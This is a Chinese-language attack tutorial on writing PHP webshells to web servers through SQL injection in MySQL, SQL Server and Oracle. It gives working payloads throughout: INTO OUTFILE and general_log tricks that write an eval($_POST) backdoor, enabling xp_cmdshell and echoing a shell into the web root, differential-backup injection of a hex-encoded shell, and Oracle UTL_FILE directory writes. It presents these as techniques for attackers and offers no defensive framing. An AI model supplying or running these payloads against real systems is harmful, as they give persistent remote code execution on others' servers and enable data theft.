1.MySQL写入WebShell
1.1写入条件
数据库的当前用户为ROOT或拥有FILE权限;
知道网站目录的绝对路径;
PHP的GPC参数为off状态;
MySQL中的secure_file_priv参数不能为NULL状态;
关于其中第4点,secure_file_priv参数是MySQL用来限制数据导入和导出操作的效果,如果这个参数被设为了一个目录名,那么MySQL会允许仅在这个目录中可以执行文件的导入和导出,例如LOAD DATA、SELECT。。。INTOOUTFILE、LOAD_FILE()等。如果这个参数为NULL,MySQL会禁止导入导出操作,但是这只是意味着通过outfile方法写入WebShell是无法成功的,但是通过导出日志的方法是可以的。
1.2使用outfile方法
outfile方法其实是Mysql提供的一个用来写入文件的函数,当我们可以控制写入的文件内容以及文件的保存路径时,我们就可以达到传入WebShell的目的。当我们可以使用union查询时,我们构造一个如下语句,就可以达到效果:
union select “这里是WebShell” into outfile “Web目录”;
当我们无法使用union时,还有一些其他方法也可以实现(利用分隔符写入):
?id=1 INTO OUTFILE '物理路径' lines terminatedby (这里是WebShell)#
?id=1 INTO OUTFILE '物理路径' fields terminatedby (这里是WebShell)#
?id=1 INTO OUTFILE '物理路径' columns terminatedby (这里是WebShell)#
?id=1 INTO OUTFILE '物理路径' lines startingby (这里是WebShell)#
1.3使用日志写入webshell
检查当前MySQL下log日志是否开启(on,off),以及log的默认地址在哪里:
show variables like '%general%';
将日志开启
Set global general_log = on;
修改日志写入位置:
Set global general_log_file = 'D:\php\phpstudy_pro\WWW\sqli\Less-7\a.log';
写入木马:
select '<?php eval($_POST['key']);?>';
2.SqlServer写入WebShell
2.1写入条件
有相应的权限db_owner
获得Web目录的绝对路径
首先我们需要查找网站目录的绝对路径,查找绝对路径的方法有5种:
通过报错信息查找;
通过目录爆破猜解;
通过旁站的目录确定;
通过存储过程来搜索;
通过读取配置文件查找。
其中通过存储过程来搜索,SQLServer提供了两种方法:xp_cmdshell和xp_dirtree
execute master…xp_dirtree‘c:’;可以查出所有c:\下的文件、目录、子目录
查找网站目录的绝对路径
在真实环境中时,我们执行execute可能并不能得到回显信息,但我们可以在注入点处新建一张表,然后将xp_dirtree查询到的信息插入其中,再查询这张表即可得相应的绝对路径了。
2.2利用存储过程写入webshell
Xp_cmdshell是一个更为有效的查询绝对路径的函数,但是目前已经被SQLServer默认关闭了,但我们可以使用如下命令启用这个选项。
EXEC sp_configure ‘show advanced options’,1;//允许修改高级参数RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;//打开xp_cmdshell扩展RECONFIGURE;–
打开xp_cmdshell扩展
开启了xp_cmsshell之后我们就可以执行CMD命令了,例如:
for /r c:%i in (1.php) do @echo %i就可以查询c:\目录下的所有符合1.php的文件,同理,在实际应用中,我们也是新建一个表,并将xp_cmdshell查询到的信息插入后,再次查询即可。
执行CMD命令查询
使用xp_cmdshell写入WebShell
我们可以通过xp_cmdshell执行系统CMD命令,例如我们可以使用CMD中的echo命令,将WebShell的代码写入到网站目录下,所以我们必须提前知道Web目录的绝对路径。
PAYLOAD:1’;execmaster..xp_cmdshell'echo^<?phpeval($_POST["pass"]);?^>>F:\\PhpStudy20180211\\PHPTutorial\\WWW\\cmd.php';
2.3利用差异备份写入webshell
首先对某一数据库进行备份。
PAYLOAD:id = 1’;backup database 库名 to disk = 'F:\\PhpStudy20180211\\PHPTutorial\\WWW\\back.bak';
创建一个写webshell的表
PAYLOAD:id = 1’; create table cybk([cmd] [image]);#创建一个新表
其次将WebShell代码写入数据库中,
PAYLOAD:id=1’;insert into cybk[cmd] vaues(0x3C3F706870206576616C28245F504F53545B2770617373275D293B203F3E);#将WebShell的代码转换成ASCII码
最后将此数据库进行差异备份,这样其中就会包含刚刚写入的WebShell代码
PAYLOAD:id=1’; backup database library todisk='F:\\PhpStudy20180211\\PHPTutorial\\WWW\\cybk.php' WITHDIFFERENTIAL,FORMAT;
2.3利用log备份写入webshell
使用Log备份写入WebShell的要求是他的数据库已经备份过,而且要选择完整模式的恢复模式,相比较差异备份而言,使用Log备份文件会小的多。
首先需要将数据库设置为完整恢复模式,然后创建一个新表,将WebShell用Ascii编码后写入其中,然后将该数据库的日志信息导出到Web目录,即可。
3.Oracle写入WebShell
3.1写入条件
1.有DBA权限
2. 获得Web目录的绝对路径
3.2使用文件访问包方法写入Webshell
首先我们需要创建一个ORACLE的目录对象指向某一路径,在真实环境中需要指向Web目录下,
在这里我们将其指向/home/oracle这一路径下:
create or replace directory IST0_DIR as ‘/home/oracle’;
创建ORACLE目录对象
创建好后,我们需要对其进行一下授权过程,让其能够顺利的写入WebShell代码。
grant read, write on directory IST0_DIR tosystem;
然后写入文件,定义变量类型为utl_file.file_type,然后将WebShell的代码写入此文件中。
直接访问该文件,即可查看到其中的WebShell代码,如果这个文件是放置在Web目录下的,那么就可以被攻击者成功利用。
